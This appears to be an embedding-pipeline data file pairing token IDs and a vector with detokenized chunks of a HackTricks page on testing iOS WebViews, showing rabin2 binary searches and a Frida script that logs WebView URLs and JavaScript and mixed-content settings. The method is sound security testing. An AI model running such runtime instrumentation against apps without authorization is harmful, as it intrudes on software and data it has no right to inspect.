1006, 1019, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 20116, 18886, 3070, 1007, 2004, 6895, 2072, 1059, 2243, 8545, 2497, 8584, 2575, 17788, 1014, 2595, 8889, 2692, 21486, 2575, 19841, 1014, 2595, 18613, 2692, 21486, 2575, 19841, 2459, 2324, 1006, 1019, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 20116, 18886, 3070, 1007, 2004, 6895, 2072, 4895, 11101, 18790, 2243, 8545, 2497, 8584, 21057, 2549, 1014, 2595, 8889, 2692, 2509, 2278, 2683, 16086, 1014, 2595, 8889, 2692, 2509, 2278, 2683, 16086, 2484, 2423, 1006, 1007, 2004, 6895, 2072, 1030, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 1059, 2243, 8545, 2497, 8584, 16576, 28311, 1014, 2595, 8889, 2692, 28154, 2629, 2063, 2549, 1014, 2595, 8889, 2692, 28154, 2629, 2063, 2549, 2603, 2484, 1006, 1007, 2004, 6895, 2072, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 1059, 2243, 8545, 2497, 8584, 2389, 16451, 8082, 2135, 2017, 2064, 2036, 3945, 2005, 2124, 4725, 1997, 2122, 4773, 8584, 4280, 1012, 2005, 2742, 1010, 3945, 2005, 1996, 4118, 2109, 2000, 3988, 4697, 1037, 1059, 2243, 8545, 2497, 8584, 1006, 1999, 4183, 1006, 4853, 1024, 9563, 1024, 1007, 1007, 1024, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 4160, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 1041, 17603, 2361, 1000, 1059, 2243, 8545, 2497, 8584, 1012, 1008, 4853, 1000, 1014, 2595, 2629, 2278, 2509, 6305, 6255, 6146, 1035, 1035, 1056, 16223, 2080, 2683, 26291, 8545, 2497, 8584, 3540, 5910, 2278, 2575, 2278, 17603, 6593, 2615, 2629, 15643, 1035, 2061, 2692, 7875, 17134, 8663, 8873, 27390, 3370, 2278, 17134, 8663, 8873, 27390, 3370, 13535, 11329, 2692, 2595, 2629, 2094, 2683, 2581, 2050, 6535, 6275, 1035, 1035, 1056, 16223, 2080, 2683, 26291, 8545, 2497, 8584, 3540, 5910, 2278, 2575, 2278, 17603, 6593, 2615, 2629, 15643, 1035, 2061, 2692, 7875, 17134, 8663, 8873, 27390, 3370, 2278, 17134, 8663, 8873, 27390, 3370, 13535, 11329, 3406, 2692, 2595, 2575, 2497, 2629, 2094, 2629, 6255, 6146, 1035, 1035, 1056, 16223, 2080, 2683, 26291, 8545, 2497, 8584, 3540, 5910, 2278, 2575, 2278, 17603, 6593, 2615, 2629, 15643, 1035, 2061, 2692, 7875, 17134, 8663, 8873, 27390, 3370, 2278, 17134, 8663, 8873, 27390, 3370, 13535, 11329, 2692, 2595, 2575, 2278, 2509, 7011, 6535 ]
hack_tricks
435.txt
1
78 _ _ t0so9wkwebviewcabsc6cgrectv5frame _ so0ab13configurationc13configurationtcfctotesting javascript configurationfor wkwebviews, as a best practice, javascript should be disabled unless it is explicitly required. to verify that javascript was properly disabled search the project for usages of wkpreferences and ensure that the javascriptenabled property is set to false : let webpreferences = wkpreferences ( ) webpreferences. javascriptenabled = falseif only having the compiled binary you can search for this in it : $ rabin2 - zz. / wheresmybrowser | grep - i " javascriptenabled " 391 0x0002f2c7 0x10002f2c7 17 18 ( 4. _ _ text. _ _ objc _ methname ) ascii javascriptenabled392 0x0002f2d9 0x10002f2d9 21 22 ( 4. _ _ text. _ _ objc _ methname ) ascii setjavascriptenabledtesting onlysecurecontentin contrast to uiwebviews, when using wkwebviews it is possible to detect mixed content ( http content loaded from a https page ). by using the method hasonlysecurecontent it can be verified whether all resources on the page have been loaded through securely encrypted connections. in the compiled binary : $ rabin2 - zz. / wheresmybrowser | grep - i " hasonlysecurecontent " you can also search in the source code or strings the string " http : / / ". however, this doesn't necessary means that there is a mixed content issue. learn more about mixed content in the mdn web docs. dynamic analysisit's possible to inspect the heap via objc. choose ( ) to find instances of the different types of webviews and also search for the properties javascriptenabled and hasonlysecurecontent : webviews _ inspector. jsobjc. choose ( objc. classes ['uiwebview'], { onmatch : function ( ui ) { console. log ('onmatch
[ 0.43938466906547546, -0.23597180843353271, -0.3003501296043396, 0.6451855301856995, -0.2666817009449005, -0.10735481977462769, -0.4397684335708618, 0.014502097852528095, 0.5026857852935791, 0.5706377029418945, 0.15603144466876984, -0.06356804072856903, 0.6199435591697693, -0.16055051982402802, -0.12008579075336456, 0.05075235292315483, -0.8879378437995911, -0.4031258821487427, -0.8380305171012878, 0.025377769023180008, 0.5938634872436523, 0.270683228969574, -1.432521104812622, -0.798061728477478, -0.5383191704750061, 0.8406834006309509, 0.190473735332489, -0.1522957682609558, 0.5809563398361206, 0.6835119724273682, 0.3019085228443146, -0.4949300289154053, 0.14437761902809143, -0.3876055181026459, -0.11850486695766449, -0.023733818903565407, 0.8343123197555542, -0.05527517944574356, -0.12198977917432785, -0.6050017476081848, 0.5592536330223083, -0.6416589617729187, -0.09919042885303497, -0.04191325232386589, -0.3591567873954773, -0.32261496782302856, 0.6497026681900024, 0.2721496820449829, 0.4128129184246063, -0.45965826511383057, 0.3217660188674927, 0.058570899069309235, 0.15420565009117126, -0.40348175168037415, -0.28940528631210327, 0.4861392676830292, 0.3880947232246399, -0.21768389642238617, -0.44536420702934265, 0.33362919092178345, 0.10432007908821106, 0.2217317670583725, 0.326183944940567, -0.38163167238235474, -0.04410770162940025, -0.04690134525299072, 0.3541611135005951, 0.2447836548089981, -0.20218299329280853, -0.01943279057741165, -0.12422201782464981, 0.7440807223320007, -0.9703810811042786, -0.031967584043741226, -0.8723496198654175, -0.4255182147026062, -0.6246919631958008, -0.012719121761620045, 0.10905550420284271, 0.7163174748420715, -0.1697855293750763, 0.6351915001869202, 0.8506868481636047, -0.2716708183288574, -0.5277648568153381, -0.3388510048389435, 0.42896145582199097, 1.146366834640503, -0.1648188978433609, 0.8738882541656494, -0.055254016071558, 0.838404655456543, -1.0263763666152954, 0.08537261933088303, 0.354994535446167, 0.8213663697242737, -0.15237359702587128, -0.09466254711151123, -0.41492703557014465, 0.010092241689562798, 0.4958406686782837, 1.2810248136520386, 0.16648533940315247, 0.6599341034889221, -0.4418950378894806, 0.044671837240457535, -0.013532633893191814, -0.5563598871231079, -0.234441339969635, 0.27584049105644226, 0.13355599343776703, -0.32500389218330383, 0.3460260033607483, -0.43991196155548096, -0.02505461499094963, 0.6023086309432983, 0.9188293218612671, 0.39829638600349426, -0.23413193225860596, 0.7072457075119019, 0.32089999318122864, 0.24203544855117798, 0.4076489210128784, 0.5155107378959656, 0.5442227125167847, -0.037454474717378616, -0.10123476386070251, 0.22999900579452515, -0.34109237790107727, -1.1442924737930298, -0.1781228482723236, -0.614039957523346, -0.20505698025226593, 0.25312286615371704, -0.5218846201896667, 0.26697418093681335, 0.589951753616333, 0.3315110504627228, 0.20617172122001648, -0.5921016931533813, 0.2273237556219101, 0.4418692886829376, 0.19223053753376007, 1.5095809698104858, 0.3688060939311981, -0.315680593252182, -0.4605723023414612, -0.0798012912273407, -0.5329135060310364, 0.2741152048110962, -0.751604437828064, 0.10631713271141052, 0.37041789293289185, 0.061844341456890106, -0.7169988751411438, -0.3831133544445038, -0.3431698679924011, 0.4237567186355591, -0.18651923537254333, -0.07024622708559036, -0.6633923053741455, 0.18905222415924072, -0.4033345580101013, 0.46118462085723877, -0.19721615314483643, 0.366153359413147, -0.3259320855140686, -0.39544418454170227, -0.3965546786785126, 0.05475353077054024, 0.5087653398513794, 0.38544362783432007, -0.10338692367076874, 0.3424050509929657, 0.41937968134880066, 0.8262999653816223, -0.031751491129398346, -0.769855260848999, 0.5422837138175964, 0.2036474347114563, -0.22885793447494507, 0.09779219329357147, 0.26297539472579956, 0.9998247623443604, -0.46838101744651794, 0.09822045266628265, 0.042320288717746735, -0.9676125049591064, -0.7483755350112915, 0.014888904988765717, 0.1550179123878479, 0.3906971216201782, -0.7798677086830139, 0.24488626420497894, 0.7679851651191711, 0.033524613827466965, -1.047450065612793, 0.08727192878723145, 0.15450699627399445, -1.0119273662567139, -0.568709135055542, 0.12091734260320663, -0.3337337374687195, 0.3493923842906952, -0.4127945303916931, -0.1885329931974411, 0.48376500606536865, 0.6677567958831787, -0.5191845297813416, 0.44550299644470215, 0.8834595680236816, 0.019679397344589233, -0.5203045010566711, 0.03859376162290573, 0.18845312297344208, -0.1666155308485031, -0.7721250057220459, 0.7426254153251648, 0.008547993376851082, 0.19908559322357178, 0.13201095163822174, 0.568392276763916, 1.1562024354934692, 0.8734179139137268, -0.14293736219406128, -0.08534036576747894, 0.07286082953214645, -0.022207578644156456, -0.3308480381965637, -0.25468266010284424, 0.24163949489593506, 0.21865461766719818, 0.3082125186920166, 1.226401448249817, -0.0606713630259037, 0.37129753828048706, 0.2064828872680664, 0.7395248413085938, 0.2828848361968994, -0.007355550769716501, -0.0670655146241188, 0.7655048370361328, 0.30706527829170227, 0.7789144515991211, 0.28574690222740173, 0.07126634567975998, -0.11942688375711441, 0.2297562211751938, 0.11788252741098404, -0.06229535490274429, 0.651776134967804, 0.562904417514801, 0.5975971817970276, 0.05561896413564682, -0.8813313841819763, -0.11052855104207993, 0.7759994268417358, 0.5983049869537354, -0.5711649060249329, -0.5583036541938782, -0.4580860137939453, 0.5161855816841125, -0.6873937249183655, -0.5618636012077332, 0.5239144563674927, -0.09541654586791992, -0.06599526852369308, 0.3567059636116028, 0.021864695474505424, -0.967625081539154, -0.7105792760848999, -0.6866662502288818, -1.1409505605697632, -0.6770060658454895, -1.265807032585144, 0.06814013421535492, 0.9816703200340271, -0.8125518560409546, 0.5804721117019653, 0.4836225211620331, -0.6401514410972595, -0.07478948682546616, -0.5150439143180847, 0.805197536945343, 0.1119980663061142, -0.14161188900470734, -0.9709912538528442, 0.20883241295814514, 0.029651254415512085, 0.2799703776836395, -0.360189288854599, -0.07855848968029022, 0.030868809670209885, -0.7556590437889099, -0.0846165269613266, -0.24184033274650574, 0.517716109752655, -0.16087882220745087, -0.5149027109146118, -0.4054992198944092, 0.8034873604774475, -0.14302532374858856, 0.5816890597343445, -0.19656601548194885, -0.9169723391532898, 0.7722225189208984, -0.19765061140060425, -0.17489995062351227, 0.29532280564308167, 0.4507720172405243, -0.5319733023643494, 0.5502761006355286, 0.5425388813018799, 0.1670321226119995, -0.546379566192627, 0.4055711328983307, 0.3478007912635803, 0.5502336621284485, -0.6021028757095337, -0.45603683590888977, 0.062125835567712784, -0.04993021860718727, 0.27114221453666687, 0.09232911467552185, -0.49716508388519287, 0.33114171028137207, 0.1387520283460617, -0.7440556883811951, 0.04246851056814194, 0.1481640636920929, -0.6443535089492798, -0.5413753390312195, -0.3153705596923828, 0.9152944684028625, 0.5078021883964539, 0.3357859253883362, 0.1038220226764679, -0.35498863458633423, 0.31686651706695557, -0.122723788022995, -0.09101812541484833, -0.7605115175247192, 0.6364808082580566, 0.023541858419775963, -0.17228572070598602, 0.06477904319763184, -0.2110290825366974, 0.1615733653306961, -0.09569067507982254, 0.07393699884414673, -0.5183829665184021, -0.06524568796157837, 0.3258543312549591, 0.2552276849746704, -0.5618607401847839, 0.7683542966842651, -0.3038802742958069, 0.13743123412132263, 0.17860154807567596, 0.30799683928489685, 0.9360539317131042, 0.15019504725933075, -0.18428194522857666, -0.06751250475645065, -0.7898253798484802, -0.9624235033988953, 0.11019555479288101, 0.35916784405708313, 0.8601012825965881, 0.005829869769513607, 0.7723810076713562, -0.15610210597515106, -0.3495618999004364, 0.5698533654212952, -0.008433588780462742, -0.452166885137558, 0.8836920857429504, -0.2867235243320465, 0.7169488668441772, -0.7578964829444885, 0.29003456234931946, 0.1861933469772339, 0.18595707416534424, 0.48399677872657776, 0.2201177328824997, -0.3253463804721832, -0.09038984030485153, -0.532599925994873, 0.3078005313873291, -0.3967922329902649, 0.2970556318759918, -0.3920687437057495, 0.3111054301261902, -0.0229352954775095, -0.758791446685791, -0.7630417346954346, 0.6173636317253113, 0.44267651438713074, 0.4191691279411316, 0.8798635601997375, 0.9530511498451233, 0.17459772527217865, -0.38389328122138977, 0.2674088776111603, -0.5371014475822449, 0.4398075342178345, -0.24674826860427856, 0.3111821413040161, -0.06264268606901169, -0.24389509856700897, -0.4423266053199768, -0.3757777512073517, -0.6312769055366516, 0.0277003962546587, 0.383686363697052, -0.44938504695892334, -0.8090367913246155, -0.5154983997344971, -0.041671521961688995, 0.41632506251335144, -0.677582323551178, -0.25674888491630554, 0.7607412934303284, 0.2129429429769516, 0.9977879524230957, -0.8416118025779724, 0.19180837273597717, -0.6730903387069702, -0.010658346116542816, 0.08799035847187042, -0.38194921612739563, -0.10914980620145798, -0.8774892687797546, -0.2742064893245697, -0.6015732288360596, 0.1292714923620224, 0.17809376120567322, -0.1710900217294693, 0.06047298014163971, -1.2031906843185425, -0.31004631519317627, 0.8454568386077881, -0.28795287013053894, -0.13578687608242035, -0.2605034410953522, 0.6935113668441772, 0.1608499139547348, 0.6973220705986023, -0.6269079446792603, -0.265811562538147, 0.20258016884326935, -0.6572803854942322, 0.4442104697227478, -0.7436442375183105, -0.17881616950035095, 0.07136725634336472, 0.11304662376642227, 0.18663476407527924, 0.8099799752235413, -0.3242126703262329, -0.3178125023841858, -0.16088813543319702, 0.1251167207956314, -0.8346280455589294, -0.3368408679962158, 0.44923582673072815, -0.06340707838535309, -0.07901572436094284, 0.3451654016971588, 0.21765445172786713, -0.039988286793231964, 0.11807418614625931, -0.1540175825357437, -0.783240020275116, 0.6165531277656555, -0.25764739513397217, 0.4136124551296234, -0.09200689941644669, -0.018067704513669014, 0.029238997027277946, -0.27622345089912415, 0.9015291333198547, -0.2279665768146515, 0.15705901384353638, -0.454496830701828, -0.43182918429374695, -0.13713431358337402, 0.09663800895214081, 0.0615040622651577, 0.26904475688934326, 0.4012260138988495, 0.19381080567836761, -0.37212440371513367, 0.29844918847084045, -0.6263042688369751, -1.0410778522491455, -0.0774279460310936, -0.07333451509475708, -0.11441250145435333, -0.07811601459980011, 0.5428691506385803, -0.46675005555152893, -1.0543403625488281, 0.7997663617134094, -0.018489761278033257, 0.18450908362865448, -0.5543889403343201, 0.178261861205101, -0.3329767882823944, 0.08473406732082367, 0.2957206964492798, 0.5088390707969666, -0.25765594840049744, -0.3689504563808441, 0.022817391902208328, -0.1958935558795929, 0.15175117552280426, 0.22191262245178223, -0.15065203607082367, 0.5251137018203735, 0.20755712687969208, -0.4189048409461975, -0.21800921857357025, 0.5067489147186279, -0.36621809005737305, 0.3149329423904419, 0.07117932289838791, -0.5479015707969666, -0.6355628967285156, -0.8912386298179626, -0.15398742258548737, -0.04382476955652237, 0.07723966985940933, -0.1313171684741974, 0.10475410521030426, -0.6419152617454529, 0.7812375426292419, -0.6758037209510803, -0.2833787798881531, 0.05467277765274048, -0.5748400688171387, 0.1867668628692627, -0.2190929502248764, 0.20972952246665955, -0.33719775080680847, -0.22162650525569916, 0.1597125083208084, -0.04944484308362007, 0.012145516462624073, 0.23611102998256683, 0.06645297259092331, -0.4904928207397461, 0.7976799011230469, -0.022009452804923058, -0.5736010670661926, -0.05616436153650284, -0.2443426102399826, -0.3162069618701935, -0.2932131290435791, 0.1316138058900833, 0.10191930085420609, 0.8411840796470642, -0.2194279134273529, 0.2878792881965637, 0.37777698040008545, -0.7597895264625549, -0.04951894283294678, -0.3387090861797333, 1.1091028451919556, -0.8675828576087952, 0.291194885969162, -0.29674530029296875, 0.5129176378250122, 0.40628936886787415, -0.19767116010189056, -0.7223816514015198, 0.5256178975105286, -0.49830660223960876, -1.404801368713379, 0.4933438301086426, -0.11112499237060547, -0.26826509833335876, -0.3889869451522827, -0.4608890414237976, 0.5046151280403137, 0.18115246295928955, 0.21070446074008942, 0.4956319332122803, -0.5662291646003723, 0.21693919599056244, -0.7683092355728149, -0.169432133436203, -0.2065364569425583, -0.15899202227592468, 0.3759363293647766, 0.00445658341050148, 0.2550826072692871, 0.43332916498184204, -0.33990535140037537, 0.1822817325592041, -0.3437381982803345, -0.5580689311027527, 0.6655032634735107, -0.8903927803039551, 0.3746814727783203, -0.29623231291770935, -1.001526117324829, -0.33552971482276917, 0.3008075952529907, 0.049067966639995575, -0.68873530626297, 0.5370150208473206, 0.4924083650112152, 0.9669551849365234, -0.48741814494132996, 0.28673744201660156, -0.408551424741745, -0.3113645315170288, 0.6494197845458984, -0.2183699607849121, -0.7453557252883911, 0.8904209136962891, 0.398541122674942, -1.1963069438934326, -0.32942995429039, 0.10234047472476959, -0.14958998560905457, -0.042944494634866714, -0.11118955910205841, -0.24926921725273132, 0.01208494883030653, -0.12138297408819199, 0.039820387959480286, 0.2613053321838379, 0.9036926031112671, 0.15522681176662445, -0.860107958316803, 0.6628069281578064, -0.7032366991043091, -0.2785634994506836, 0.7876573801040649, -0.8025425672531128, 0.061688609421253204, -0.5611188411712646, -0.13964946568012238, 0.3623924255371094, -0.0861692875623703, 0.9097570180892944, -0.5340941548347473, 0.38856229186058044, 0.3440658450126648, -0.5094677805900574, 0.484652578830719, 0.1308346688747406, -0.1360870897769928, 0.44037753343582153, 0.6106019616127014, -0.11627549678087234, -0.059055816382169724, 0.2783811092376709, 0.4834553003311157, 0.2246716171503067, -0.9385460615158081, -0.2680002450942993, 0.1519535481929779, -0.5748070478439331, -0.05493512749671936, -0.5425388216972351, -0.8879045844078064, -0.7536882758140564, -0.24613547325134277, -0.09231717139482498, 0.6300941705703735, -0.14670728147029877, 0.19844067096710205, -0.333534836769104, -0.2134544551372528, -0.36803263425827026, 0.22791826725006104, -0.06447523832321167, 0.442974328994751, -0.3718661665916443, 0.22374077141284943, -1.082395076751709, -0.6628021001815796, -0.5144850611686707, -0.5627421736717224, -0.13914135098457336, -0.7129586935043335, -0.07758034020662308, -0.15969908237457275, -0.8795775175094604, -0.029510224238038063, -0.5264570116996765, 0.29493486881256104, 0.2117471545934677, -0.654180109500885, -0.008696941658854485, 0.10018936544656754, -0.03912538290023804, 0.17446091771125793, 0.34788861870765686, 0.5445476770401001, -0.16621831059455872, -0.08136919885873795, -0.11141622811555862, -0.0032293268013745546, 0.04429774731397629, 0.3312511146068573, 0.20450879633426666, -0.25996968150138855, 0.46490222215652466, -0.3228740096092224, -0.19802816212177277, -0.07450711727142334, 0.13653141260147095, -0.3707515001296997, 0.6045842170715332, 0.2991863191127777, 0.5124655961990356, 1.0178204774856567, 0.3488374948501587, 0.6428215503692627, -0.6340811252593994, 0.4544580578804016, 0.4450331926345825, -0.630103588104248, -0.09342168271541595, 0.4049118757247925, 1.0534508228302002, -0.14540477097034454, 0.8750169277191162, 0.2856188714504242, -0.427689790725708, 0.7767915725708008, 0.1410161703824997, -0.49524661898612976, -0.3675001859664917, -0.9440290927886963, 0.5579308271408081, 0.4118700325489044, 0.2526825964450836, -0.23231102526187897, 0.5206003785133362, 0.08143822103738785, -0.7322838306427002, 0.5255383849143982, -0.8395751118659973, -0.09006951749324799, 0.46761390566825867, -0.2621200680732727, -0.4991203248500824, -0.9522369503974915, -0.13680508732795715, 0.06721752882003784, 0.07266461849212646, -0.7793766856193542, -0.4213666319847107, 0.10542358458042145, 0.13235263526439667, 0.9025013446807861, -0.09263262897729874, -0.892865777015686, -0.5791754126548767, 0.365037202835083, -0.8255318403244019, -0.5837346911430359, 0.09877784550189972, 1.1709725856781006, 0.5717535018920898, 0.0780787542462349, -0.5490075349807739, -0.06273282319307327, 0.038792628794908524, -0.3916005492210388, 0.11532017588615417, -0.031786754727363586, -0.34193626046180725, 0.015480603091418743, -0.806598424911499, -0.09469250589609146, -0.37547269463539124, 0.2572098970413208, 0.10306072980165482, -0.6035231947898865, -0.19735252857208252, 0.6394548416137695, 0.11809612065553665, -0.6479564309120178, 0.8295453190803528, -0.02096070535480976, 0.3400351107120514, -0.12912093102931976, -0.32515662908554077, -0.5196951627731323, 0.512325644493103, 1.0583949089050293, 0.35473358631134033, 0.03218120336532593, 0.06625733524560928, 0.8202993869781494, -0.49614664912223816, -0.16545629501342773, 0.19702781736850739, 0.47826990485191345, -0.42819786071777344, 0.18912479281425476, -0.40597856044769287, 0.09712961316108704, -0.2849368453025818, -0.5536841154098511, 0.042875830084085464, 0.22929732501506805, -0.020532328635454178, 0.12176584452390671, -0.33638033270835876, 0.7873350381851196, -0.9082078337669373, 0.6422283053398132, -0.12286210805177689, 0.07239028811454773, 0.13559003174304962, 0.4737425148487091, -0.6646939516067505, 0.6241007447242737, 0.8894816637039185, 0.1411360651254654, 0.020796582102775574, 0.30010733008384705, -0.39294806122779846, 0.24602997303009033, 0.6586462259292603, -0.11754090338945389, -0.2519088089466095, 0.3940812349319458, -0.10858943313360214, -0.3139602839946747, -0.8601089715957642, 0.012885724194347858, 0.5617611408233643, -0.18729794025421143, 0.4721381962299347, 0.06840493530035019, -0.2731124758720398, -0.5493295192718506, 0.7221390008926392, -0.36939629912376404, 0.11830326914787292, 0.07303763926029205, -0.525306761264801, -0.32896509766578674, 0.9489684700965881, 0.5811588168144226, 0.9995956420898438, -0.5949468612670898, 0.669052243232727, -0.059022244065999985, 0.24004973471164703, -0.3363930284976959, -0.7234013080596924, -0.9439294934272766, 0.12336286902427673, -0.20228548347949982, -0.26724836230278015, -0.7439905405044556, -0.3558807969093323, 0.4383919835090637, -0.20053257048130035, -0.5060949325561523, -0.39965105056762695, 0.2952977418899536, -0.14097510278224945, -0.8406609296798706, 0.43462270498275757, -0.14129658043384552, -0.6134163737297058, 0.6103288531303406, 0.18303076922893524, 0.20235827565193176, 0.3143683969974518, -0.5106176137924194, -0.2687370181083679, -0.1976487785577774, -0.09104044735431671, -0.054283257573843, 0.35375747084617615, -0.6519231796264648, -0.02384953759610653, -0.2066217064857483, -1.1852458715438843, -0.8145909905433655, 0.20109108090400696, 0.019059909507632256, -1.0263601541519165, 0.4378366470336914, 0.45120301842689514, 0.6007902026176453, 0.7494768500328064, -0.6704960465431213, -0.4148991107940674, 0.229319766163826, 0.6212134957313538, -0.14216607809066772, 0.2511458098888397, 0.28700247406959534, -0.3385143280029297, 0.6616395115852356, -0.06301276385784149, 1.065043330192566, -0.208159402012825, -0.5250683426856995, -0.1784748136997223, 0.19302748143672943, -0.6605225205421448, -0.09362538158893585, 0.009388307109475136, 0.23405587673187256, -0.7566237449645996, -0.20831860601902008, -1.1550791263580322, 0.25353050231933594, -0.3862709105014801, 0.16083410382270813, 0.20765607059001923, 0.3763042688369751, 0.7723089456558228, 0.06585682928562164, 0.7381700873374939, -1.0039994716644287, 4.4170637130737305, 0.2335428148508072, -0.2886471450328827, -0.17553961277008057, -0.05370898172259331, 0.48430943489074707, 0.7338641881942749, -0.3136592507362366, 0.1944112479686737, -0.3588509261608124, -0.17971684038639069, -0.10160306096076965, 1.1431411504745483, 0.35725274682044983, 0.05928734317421913, 0.31721627712249756, -0.7528733611106873, 0.03239022195339203, 0.5951980948448181, -1.0497583150863647, -0.736891508102417, 0.2015305757522583, -0.478832870721817, 0.7271462678909302, 0.675922155380249, 0.2830921411514282, 0.00739352498203516, -0.613724946975708, 0.3116965889930725, -0.6324260234832764, -0.2506752014160156, 0.03677626699209213, 0.040233064442873, -0.21049641072750092, -0.7455930113792419, 0.30428585410118103, 0.0025829889345914125, -0.4145345389842987, -0.07135351747274399, 0.19979724287986755, 0.1949874460697174, -0.06604095548391342, 0.12108016759157181, -0.6073296070098877, 0.13304142653942108, 0.3667656183242798, -0.36489248275756836, -0.06832533329725266, 0.8655014634132385, -0.3196932375431061, 0.6564851403236389, -0.16339947283267975, 0.43607059121131897, -0.3915976583957672, -0.3230102062225342, 0.6829403638839722, -0.1575695276260376, -0.036214679479599, 0.3722238838672638, -0.22849173843860626, 0.9694012403488159, -0.35168302059173584, 0.06506650149822235, -0.13019274175167084, -1.3264777660369873, -0.07979345321655273, 0.00003643731906777248, 0.3755229711532593, -0.3191590905189514, -0.694028377532959, -0.17751921713352203, 0.06594444066286087, -0.03396223857998848, -0.47638651728630066, 0.936080276966095, 0.11725690215826035, -0.43238046765327454, 0.04974484071135521, 1.2989966869354248, -0.5808403491973877, 0.24089497327804565, -0.28548842668533325, -0.14984062314033508, -0.11586335301399231, 1.0313608646392822, 0.39702317118644714, -0.2672080099582672, -0.30122750997543335, 0.08111298084259033, 0.5079851150512695, 0.4508446753025055, -0.0059236460365355015, -0.34241601824760437, 0.40514034032821655, 0.4258882701396942 ]
[ 6275, 1035, 1035, 1056, 16223, 2080, 2683, 26291, 8545, 2497, 8584, 3540, 5910, 2278, 2575, 2278, 17603, 6593, 2615, 2629, 15643, 1035, 2061, 2692, 7875, 17134, 8663, 8873, 27390, 3370, 2278, 17134, 8663, 8873, 27390, 3370, 13535, 11329, 3406, 22199, 2075, 9262, 22483, 9563, 29278, 1059, 2243, 8545, 2497, 8584, 2015, 1010, 2004, 1037, 2190, 3218, 1010, 9262, 22483, 2323, 2022, 9776, 4983, 2009, 2003, 12045, 3223, 1012, 2000, 20410, 2008, 9262, 22483, 2001, 7919, 9776, 3945, 1996, 2622, 2005, 8192, 2015, 1997, 1059, 2243, 28139, 25523, 2015, 1998, 5676, 2008, 1996, 9262, 22483, 8189, 23242, 3200, 2003, 2275, 2000, 6270, 1024, 2292, 4773, 28139, 25523, 2015, 1027, 1059, 2243, 28139, 25523, 2015, 1006, 1007, 4773, 28139, 25523, 2015, 1012, 9262, 22483, 8189, 23242, 1027, 6270, 10128, 2069, 2383, 1996, 9227, 12441, 2017, 2064, 3945, 2005, 2023, 1999, 2009, 1024, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 24665, 13699, 1011, 1045, 1000, 9262, 22483, 8189, 23242, 1000, 4464, 2487, 1014, 2595, 8889, 2692, 2475, 2546, 2475, 2278, 2581, 1014, 2595, 18613, 2692, 2475, 2546, 2475, 2278, 2581, 2459, 2324, 1006, 1018, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 27885, 3501, 2278, 1035, 2777, 7295, 14074, 1007, 2004, 6895, 2072, 9262, 22483, 8189, 23242, 23499, 2475, 1014, 2595, 8889, 2692, 2475, 2546, 2475, 2094, 2683, 1014, 2595, 18613, 2692, 2475, 2546, 2475, 2094, 2683, 2538, 2570, 1006, 1018, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 27885, 3501, 2278, 1035, 2777, 7295, 14074, 1007, 2004, 6895, 2072, 2275, 3900, 12044, 23235, 8189, 23242, 22199, 2075, 2069, 3366, 23887, 8663, 6528, 7629, 5688, 2000, 21318, 8545, 2497, 8584, 2015, 1010, 2043, 2478, 1059, 2243, 8545, 2497, 8584, 2015, 2009, 2003, 2825, 2000, 11487, 3816, 4180, 1006, 8299, 4180, 8209, 2013, 1037, 16770, 3931, 1007, 1012, 2011, 2478, 1996, 4118, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 2009, 2064, 2022, 20119, 3251, 2035, 4219, 2006, 1996, 3931, 2031, 2042, 8209, 2083, 28999, 4372, 26775, 22571, 3064, 7264, 1012, 1999, 1996, 9227, 12441, 1024, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 24665, 13699, 1011, 1045, 1000, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1000, 2017, 2064, 2036, 3945, 1999, 1996, 3120, 3642, 2030, 7817, 1996, 5164, 1000, 8299, 1024, 1013, 1013, 1000, 1012, 2174, 1010, 2023, 2987, 1005, 1056, 4072, 2965, 2008, 2045, 2003, 1037, 3816, 4180, 3277, 1012, 4553, 2062, 2055, 3816, 4180, 1999, 1996, 9108, 2078, 4773, 9986, 2015, 1012, 8790, 4106, 4183, 1005, 1055, 2825, 2000, 22459, 1996, 16721, 3081, 27885, 3501, 2278, 1012, 5454, 1006, 1007, 2000, 2424, 12107, 1997, 1996, 2367, 4127, 1997, 4773, 8584, 2015, 1998, 2036, 3945, 2005, 1996, 5144, 9262, 22483, 8189, 23242, 1998, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1024, 4773, 8584, 2015, 1035, 7742, 1012, 1046, 6499, 2497, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 21318, 8545, 2497, 8584, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 21318, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818 ]
hack_tricks
435.txt
2
: ', ui ) ; console. log ('url : ', ui. request ( ). tostring ( ) ) ; }, oncomplete : function ( ) { console. log ('done for uiwebview!') ; } } ) ; objc. choose ( objc. classes ['wkwebview'], { onmatch : function ( wk ) { console. log ('onmatch : ', wk ) ; console. log ('url : ', wk. url ( ). tostring ( ) ) ; }, oncomplete : function ( ) { console. log ('done for wkwebview!') ; } } ) ; objc. choose ( objc. classes ['sfsafariviewcontroller'], { onmatch : function ( sf ) { console. log ('onmatch : ', sf ) ; }, oncomplete : function ( ) { console. log ('done for sfsafariviewcontroller!') ; } } ) ; objc. choose ( objc. classes ['wkwebview'], { onmatch : function ( wk ) { console. log ('onmatch : ', wk ) ; console. log ('javascriptenabled : ', wk. configuration ( ). preferences ( ). javascriptenabled ( ) ) ; } } ) ; objc. choose ( objc. classes ['wkwebview'], { onmatch : function ( wk ) { console. log ('onmatch : ', wk ) ; console. log ('hasonlysecurecontent : ', wk. hasonlysecurecontent ( ). tostring ( ) ) ; } } ) ; load it with : frida - u com. authenticationfailure. wheresmybrowser - l webviews _ inspector. jsonmatch : < wkwebview : 0x1508b1200 ; frame = ( 0 0 ; 320 393 ) ; layer = < calayer : 0x1c4238f20 > > hasonlysecurecontent : falsewebview protocol handlingseveral default schemes
